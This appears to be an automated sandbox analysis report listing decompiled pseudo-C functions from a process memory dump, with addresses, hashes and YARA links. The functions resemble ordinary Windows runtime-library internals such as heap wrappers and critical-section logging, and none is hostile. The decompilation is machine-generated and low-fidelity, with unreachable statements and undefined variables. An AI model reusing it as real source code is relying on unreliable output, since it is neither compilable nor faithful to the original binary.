Instruction Fuzzy Hash: 6B011270A00209EFDB14DFA8D556A6EB7F4FF04304F544199A555EB382D635ED01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 04DD8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04DD8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4dfd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04dd8f6a
0x04dd8f79
0x04dd8f81
0x04dd8f84
0x04dd8f8b
0x04dd8f91
0x04dd8f94
0x04dd8f9e
0x04dd8fb0
0x04dd8fa0
0x04dd8fa9
0x04dd8fa9
0x04dd8fbb
0x04dd8fbc
0x04dd8fbe
0x04dd8fc3
0x04dd8fd6

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c013f30342360fe3dd7baec8d336fba23805812b2463af710745651d83c7ff
Instruction ID: cb6c9db927a4b19bcb00a87aa22c38caaeab53ad493865ba8def14e1023e53d5
Opcode Fuzzy Hash: c8c013f30342360fe3dd7baec8d336fba23805812b2463af710745651d83c7ff
Instruction Fuzzy Hash: 4E013C74A00208AFDB04EFB8D545AAEB7F4EF58304F50405AB915EB381EA74FA00DB94

Uniqueness

Uniqueness Score: -1.00%

Function 04DC131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04DC131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4dfd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04dc131b
0x04dc132a
0x04dc1330
0x04dc1336
0x04dc133e
0x04dc1341
0x04dc1344
0x04dc134f
0x04dc1361
0x04dc1351
0x04dc135a
0x04dc135a
0x04dc136c
0x04dc136d
0x04dc136f
0x04dc1374
0x04dc1387

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e6256a72f9d2ceb9812498c61137c0ba2bbf62854e7cea1dc444b5edd16d4d
Instruction ID: abd45bc86c38e3c5e6ad4251f796f0369284fb806383ac08155abb3b4530ecb1
Opcode Fuzzy Hash: 78e6256a72f9d2ceb9812498c61137c0ba2bbf62854e7cea1dc444b5edd16d4d
Instruction Fuzzy Hash: 44013C71A01218AFDB04EFA9D545AAEB7F4FF48704F40405AF945EB381E674EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04D2C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D2C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04D2C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4ce11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E04DD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x04d2c577
0x04d2c57d
0x04d2c581
0x04d2c5b5
0x04d2c5b9
0x04d2c5ce
0x04d2c5ce
0x04d2c5ca
0x00000000
0x04d2c5ca
0x04d2c5c4
0x04d2c5c8
0x00000000
0x00000000
0x00000000
0x04d2c5ad
0x00000000
0x04d2c5af

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49c32de8a85aac9e5c44ce4f5d99d68dcdfe484e56f05cee7a6e8ea53ec73d8d
Instruction ID: 9c2a8790ab506d1f8e5d571fd03f61dcc67194d0d6f1dd4588e68eccc24faf92
Opcode Fuzzy Hash: 49c32de8a85aac9e5c44ce4f5d99d68dcdfe484e56f05cee7a6e8ea53ec73d8d
Instruction Fuzzy Hash: A0F090B2A356B29EE7369B14C20CB2A7BD4AB25F7CF484466E45587105D6A4FC80C261

Uniqueness

Uniqueness Score: -1.00%

Function 04DC2073, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04DC2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E04DBFD22(__ecx);
				_t19 =  *0x4df849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x4df8748; // 0x0
					if(__eflags <= 0) {
						E04DC1C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x4df8724 & 0x00000004;
							if(( *0x4df8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x4df8724; // 0x0
					return E04DB8DF1(__ebx, 0xc0000374, 0x4df5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x04dc2076
0x04dc2078
0x04dc207d
0x04dc2083
0x04dc20a4
0x04dc20aa
0x04dc20ac
0x04dc20b7
0x04dc20ba
0x04dc20bc
0x04dc20c9
0x04dc20c9
0x04dc20d0
0x04dc20d2
0x00000000
0x04dc20d2
0x04dc20be
0x04dc20c3
0x04dc20c5
0x04dc20c7
0x00000000
0x00000000
0x04dc20c7
0x04dc20bc
0x04dc20d4
0x04dc2085
0x04dc2085
0x04dc20a3
0x04dc20a3

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31d01acf324e4f4faad528f4763707f7b1fc08dcf927f0509ed5438fbe594f0a
Instruction ID: c4e246aaefa7e54abefdc8b458a4e72cb7b73b42329405a3d5cb82d5807030d9
Opcode Fuzzy Hash: 31d01acf324e4f4faad528f4763707f7b1fc08dcf927f0509ed5438fbe594f0a
Instruction Fuzzy Hash: B3F02726E115868AEF32BF2575203D16F90E745318F0904CFF89017701C638AC83FE61

Uniqueness

Uniqueness Score: -1.00%

Function 04DD8D34, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E04DD8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x4dfd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E04D27D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x04dd8d34
0x04dd8d43
0x04dd8d4b
0x04dd8d4e
0x04dd8d52
0x04dd8d5c
0x04dd8d6e
0x04dd8d5e
0x04dd8d67
0x04dd8d67
0x04dd8d79
0x04dd8d7a
0x04dd8d7c
0x04dd8d81
0x04dd8d94

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d0408dcca8d5fcc7c23f64d0a4029bd8b109f31da998c2f5ce42094aaa25d83
Instruction ID: d5255a2e9ca51e8ceed6f1517674a016e89424dc1b065526d4935e50252ff634
Opcode Fuzzy Hash: 1d0408dcca8d5fcc7c23f64d0a4029bd8b109f31da998c2f5ce42094aaa25d83
Instruction Fuzzy Hash: 43F09070E046089FDB14EBB8D542B6E77B4EB54704F508099E916AB281EA34E9009764

Uniqueness

Uniqueness Score: -1.00%

Function 04DD8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04DD8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dfd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04D27D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04dd8ce5
0x04dd8ced
0x04dd8cf0
0x04dd8cfb
0x04dd8d0d
0x04dd8cfd
0x04dd8d06
0x04dd8d06
0x04dd8d18
0x04dd8d19
0x04dd8d1b
0x04dd8d20
0x04dd8d33

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d36ea1034f1c9117015c1dff07bb151c68db34bebb4bcffb92ca22891bbfbf94
Instruction ID: 53bfed6e6c28416442f2c8299683631b12fa3b60f709e7392651262185cc6406
Opcode Fuzzy Hash: d36ea1034f1c9117015c1dff07bb151c68db34bebb4bcffb92ca22891bbfbf94
Instruction Fuzzy Hash: 13F08270A04248AFDB04EBB9D956E6E77B8EF58304F50019AF916EB3C1EA34E900D764

Uniqueness

Uniqueness Score: -1.00%

Function 04D2746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E04D2746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04D1EB70(__ecx, 0x4df79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04D495D0();
							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x04d2746d
0x04d2746d
0x04d2746d
0x04d27471
0x04d27488
0x04d6f92d
0x04d2748e
0x04d27491
0x04d27495
0x04d6f937
0x04d6f93a
0x04d6f94e
0x04d6f953
0x04d6f956
0x04d6f956
0x04d27495
0x00000000
0x04d27488
0x04d27473
0x04d27478
0x04d2747d
0x04d27481
0x00000000
0x04d27481
0x04d2747d
0x04d2747a
0x00000000

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72543fb72746d986854a30646ff8469284df3ceb0b1531d0a33e4fb13059fefb
Instruction ID: 9613e11f43787ffb1b2a834dfbf7394dcb6a51827b8152fb59416780d137a9a8
Opcode Fuzzy Hash: 72543fb72746d986854a30646ff8469284df3ceb0b1531d0a33e4fb13059fefb
Instruction Fuzzy Hash: 9BF0B434B44964ABDF219B68CA40B797BA1BF2531CF040256D891AB160F724F8028795

Uniqueness

Uniqueness Score: -1.00%

Function 04DD8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E04DD8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4dfd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04D27D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x04dd8b67
0x04dd8b6f
0x04dd8b72
0x04dd8b7d
0x04dd8b8f
0x04dd8b7f
0x04dd8b88
0x04dd8b88
0x04dd8b9a
0x04dd8b9b
0x04dd8b9d
0x04dd8ba2
0x04dd8bb5

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d799ead46bd3711dae0b1103014c59aa7082d6cafaa36cb6bc4d0b2dacaf07
Instruction ID: 506b00a78d621607705cc744000280ff4a06060055b9c1d331276f7b48026458
Opcode Fuzzy Hash: 20d799ead46bd3711dae0b1103014c59aa7082d6cafaa36cb6bc4d0b2dacaf07
Instruction Fuzzy Hash: 86F089B0B042589BDB10EBB4D516E6E77B4EF44304F440459B915DB3C1EA74E900D754

Uniqueness

Uniqueness Score: -1.00%

Function 04D04F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D04F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04DD88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04D2C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4ce1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x04d04f2e
0x04d04f34
0x04d04f38
0x04d60b85
0x04d60b85
0x04d60b89
0x04d60b9a
0x04d60b9a
0x04d60b9f
0x00000000
0x04d60b9f
0x04d60b94
0x04d60b98
0x00000000
0x00000000
0x00000000
0x04d60b98
0x04d04f3e
0x04d04f48
0x00000000
0x04d04f6e
0x00000000
0x04d04f70

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2657a0150dbe9f97f2dce8c61382ceada34d05b63c94ec63c44e860cd75cefa
Instruction ID: ddf8be8dc0243342ff1f4c568abe6b62babaa4f473b086dcd9465a36c6e84939
Opcode Fuzzy Hash: c2657a0150dbe9f97f2dce8c61382ceada34d05b63c94ec63c44e860cd75cefa
Instruction Fuzzy Hash: 8CF0BE32A256948FE762DB1CC184B26B7D8FB017B8F048465D40787920C724FC44C654

Uniqueness

Uniqueness Score: -1.00%

Function 04D3A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D3A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4df67e4 >= 0xa) {
					if(_t5 < 0x4df6800 || _t5 >= 0x4df6900) {
						return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04D20010(0x4df67e0, _t5);
				}
			}

0x04d3a190
0x04d3a1a6
0x04d3a1c2
0x00000000
0x00000000
0x00000000
0x04d3a192
0x04d3a192
0x04d3a19f
0x04d3a19f

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1502e42d56e91466e9bf2fa4224577224a57c726924c4e4938c0d5aae6833e9c
Instruction ID: 5df64d0bc6f5e97d50a79a9f4f3f26b9be34cf77dace0a88f3076296c3f4934c
Opcode Fuzzy Hash: 1502e42d56e91466e9bf2fa4224577224a57c726924c4e4938c0d5aae6833e9c
Instruction Fuzzy Hash: 49D02B2132000026F63D9710AE14B2122E2E7D070DF310C0DF3431BF94DA50FCD28158

Uniqueness

Uniqueness Score: -1.00%

Function 04D316E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D316E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04D31710(0x4df67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04D24620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x04d316e8
0x04d316ef
0x04d316f3
0x04d316fe
0x00000000
0x04d31700
0x04d3170d
0x04d3170d
0x04d316f2
0x04d316f2
0x04d316f2
0x04d316f2

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d389ef434b80bf77b0992fb72529dc0629e554a05b006bc9ad932c2fc6eec58b
Instruction ID: 567df53c5cf24940856f466340aac40c8c87af1eadddd38ea7dc36dd666e8514
Opcode Fuzzy Hash: d389ef434b80bf77b0992fb72529dc0629e554a05b006bc9ad932c2fc6eec58b
Instruction Fuzzy Hash: 20D0A77220010192FA2D5B119C04B183251EBD078BF38006CF207598C0CFA0FD92E458

Uniqueness

Uniqueness Score: -1.00%

Function 04D335A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D335A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04D1EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x04d335a1
0x04d335a1
0x04d335a5
0x04d335ab
0x04d335ab
0x04d335b5
0x00000000
0x04d335c1
0x04d335b7

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: 4f6f3df77533a1724898d739d13c275408e672378f70d681af51c18b74fce23b
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 4AD0C935A51184AAEB51AB50D31CB6877B2FB0031AF5820659C46069A2C3BAAA5AD601

Uniqueness

Uniqueness Score: -1.00%

Function 04D336CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D336CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x04d336d2
0x04d336e8
0x04d336d4
0x04d336e5
0x04d336e5

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: c0e182e8a820bd129bfe928ab1a9fa70a870db40cc595c6b9accda6b8f207163
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: BFC02B70250440FFE7155F30CF00F147254F700A27F680354B220494F0D528BC00DA00

Uniqueness

Uniqueness Score: -1.00%

Function 04D0AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D0AD30(intOrPtr _a4) {

				return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04d0ad49

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: c9bd983abb89824d1ed5b3dc3ea7df7825324decc049c65b2f4e412b4f9e2615
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: C6C08C32180248BBC7226A45CE00F017B29E7A0B60F000020F6040B6618932E860D598

Uniqueness

Uniqueness Score: -1.00%

Function 04D27D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D27D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04d27d56
0x04d27d5b
0x04d27d60
0x04d27d5d
0x04d27d5d
0x04d27d5d

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 5caba02d81828ff0bf7cdfeba37830d32a052595915d5f39981dd2fc9a7062a9
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 59B09234301940CFCF26DF28C180B1533E4BB44A44B8400D0E400CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 04D9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04D9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E04D4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04D95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04D95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x04d9fdda
0x04d9fde2
0x04d9fde5
0x04d9fdec
0x04d9fdfa
0x04d9fdff
0x04d9fe0a
0x04d9fe0f
0x04d9fe17
0x04d9fe1e
0x04d9fe19
0x04d9fe19
0x04d9fe19
0x04d9fe20
0x04d9fe21
0x04d9fe22
0x04d9fe25
0x04d9fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D9FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D9FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D9FE01

Memory Dump Source

Source File: 00000011.00000002.506193741.0000000004CE0000.00000040.00000001.sdmp, Offset: 04CE0000, based on PE: true

Associated: 00000011.00000002.507881606.0000000004DFB000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.507910286.0000000004DFF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
Instruction ID: 9d00da377708bd8d7c16b087897eb991dc09193b4945032d391796791cbde19a
Opcode Fuzzy Hash: 36081e09a024ea487337ea1a3efc5c5f00a86867ab1dc643ed392d382d9c9246
